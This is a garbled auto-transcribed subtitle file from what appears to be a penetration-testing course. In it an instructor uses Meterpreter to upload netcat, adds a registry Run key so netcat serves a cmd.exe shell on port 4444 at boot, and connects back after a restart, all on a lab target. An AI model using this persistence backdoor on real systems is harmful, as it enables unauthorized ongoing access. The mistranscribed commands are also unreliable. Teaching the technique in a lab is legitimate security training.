1 00:00:00,730 --> 00:00:06,310 So my interpreter has some very useful functions for registry interaction. 2 00:00:07,640 --> 00:00:12,380 You can read, write, create and delete remotely any registry entry. 3 00:00:13,630 --> 00:00:20,080 So these can be used for, well, any number of actions, including remote information gathering. 4 00:00:21,610 --> 00:00:28,630 So by using the registry, one can find what files have been used, websites visited, programs, USB 5 00:00:28,630 --> 00:00:30,780 devices used and so on and so forth. 6 00:00:31,950 --> 00:00:37,740 So basically, the Windows Registry is a magical place, and if you're planning on doing more. 7 00:00:39,070 --> 00:00:41,630 And yes, it is my job to help you do more. 8 00:00:41,890 --> 00:00:47,590 So let's plan for it by creating a persistent net cat back door. 9 00:00:48,850 --> 00:00:53,020 So in this example, instead of looking up information on the remote system. 10 00:00:54,160 --> 00:00:57,010 You will be installing a net cat back door. 11 00:00:58,220 --> 00:01:05,870 And it's going to include changes to the system of registry and firewall and send back to you a persistent 12 00:01:05,870 --> 00:01:06,320 shell. 13 00:01:07,600 --> 00:01:09,070 So let me show you the conter. 14 00:01:11,470 --> 00:01:13,210 After gaining an interpreter, Cheryl. 15 00:01:14,230 --> 00:01:23,380 You can use the Regg command to interact with the Windows Remote Registry, and here's a help menu for 16 00:01:23,380 --> 00:01:23,980 this command. 17 00:01:25,190 --> 00:01:27,920 And you can do many, many things with these parameters. 18 00:01:29,000 --> 00:01:33,410 But my point here is to create a persistent back door on the target. 19 00:01:34,430 --> 00:01:40,610 And to accomplish that, I will upload Net Cat, which is a legitimate Doddy file. 20 00:01:41,740 --> 00:01:49,900 So upload user share windows binaries NCDC. 21 00:01:50,840 --> 00:01:52,730 To see. 22 00:01:54,630 --> 00:01:55,410 Windows. 23 00:01:56,740 --> 00:01:58,300 System 32. 24 00:02:03,160 --> 00:02:05,410 And sure enough, uploading the OK. 25 00:02:07,700 --> 00:02:16,120 So now I need to run that cat on behalf of the current user by manipulating the registry to do that 26 00:02:16,580 --> 00:02:17,280 first. 27 00:02:17,530 --> 00:02:19,670 I'm going to enumerate the key. 28 00:02:21,350 --> 00:02:22,400 HK Elim. 29 00:02:29,080 --> 00:02:31,870 Windows current version. 30 00:02:34,200 --> 00:02:34,740 Run. 31 00:02:39,260 --> 00:02:45,920 Now, this guy is special because it defines the applications, it will run automatically when the system 32 00:02:45,920 --> 00:02:46,370 starts. 33 00:02:48,100 --> 00:02:54,490 Key will bring the values and KEH to specify the key name. 34 00:02:55,760 --> 00:02:57,920 And here are the entries of the key. 35 00:02:59,470 --> 00:03:04,150 So now I'm going to add a value to this key so that I can run the Netcare. 36 00:03:05,660 --> 00:03:10,220 So type Regg, set Val K. 37 00:03:11,680 --> 00:03:13,060 The key name and. 38 00:03:16,180 --> 00:03:18,130 The back door. 39 00:03:19,530 --> 00:03:20,190 And then. 40 00:03:21,680 --> 00:03:22,220 D.. 41 00:03:24,490 --> 00:03:31,330 See Windows System 32 and see that Yangzi. 42 00:03:32,480 --> 00:03:33,230 LDP. 43 00:03:34,320 --> 00:03:39,870 Four four four four E samed exi. 44 00:03:41,020 --> 00:03:44,360 OK, it's a long line, but it's kind of simple to explain. 45 00:03:44,380 --> 00:03:45,300 So let's break it down. 46 00:03:46,240 --> 00:03:50,980 Said Val, Well said, the value of an entry for the registry key. 47 00:03:52,390 --> 00:03:54,700 V gives a name to the entry. 48 00:03:55,950 --> 00:03:57,790 And finally, the D. 49 00:03:59,140 --> 00:04:01,180 Adds the data to the entry. 50 00:04:02,340 --> 00:04:05,990 Yeah, so banning the entry is OK. 51 00:04:07,490 --> 00:04:08,090 Reg. 52 00:04:09,040 --> 00:04:10,750 Query Val Kay. 53 00:04:11,880 --> 00:04:12,690 The key name. 54 00:04:13,980 --> 00:04:17,040 And the back door. 55 00:04:19,740 --> 00:04:26,400 So query Val will display the data for a specific entry as it is. 56 00:04:28,060 --> 00:04:35,320 OK, now that cat will be run with these parameters and it will start a Windows command line on PT. 57 00:04:35,320 --> 00:04:40,030 four four four four if Métis voidable three restarts. 58 00:04:42,230 --> 00:04:46,360 OK, so let me quickly show you the registry as well. 59 00:04:53,390 --> 00:04:56,360 All right, so here is the value that you just added. 60 00:04:57,550 --> 00:05:00,880 And now I'll quickly restart Miss Boiko three. 61 00:05:02,800 --> 00:05:04,810 When a split starts again. 62 00:05:09,870 --> 00:05:12,120 And see, my session naturally died. 63 00:05:14,320 --> 00:05:15,820 But now I don't need this anymore. 64 00:05:22,010 --> 00:05:23,270 So I'll open a new tab. 65 00:05:26,420 --> 00:05:33,980 Type N.C., they tend tend to tend and PT. four four four four. 66 00:05:34,930 --> 00:05:35,710 Purrfect. 67 00:05:36,890 --> 00:05:42,620 We connect the Windows command line that gets started for us on board four four four four. 68 00:05:44,200 --> 00:05:49,480 So that way you can use any Windows commands here, for example, IP config. 69 00:05:52,750 --> 00:05:55,300 Congratulations, you have your first system back door. 70 00:05:56,930 --> 00:05:59,420 And you can come back any time you need to use it. 71 00:06:01,030 --> 00:06:08,110 And let me tell you, additionally, in a real world situation, you would not be using such a simple 72 00:06:08,110 --> 00:06:13,370 back door like this because, you know, there's no authentication or encryption. 73 00:06:14,440 --> 00:06:21,490 However, the principles of the process remain the same for other changes to the system and other sorts 74 00:06:21,490 --> 00:06:24,640 of programs you might want to execute on startup. 75 00:06:25,710 --> 00:06:33,000 I'm going to tell you about MSM venom in the next section so that you can create later on your custom 76 00:06:33,150 --> 00:06:36,270 data file to use for this process.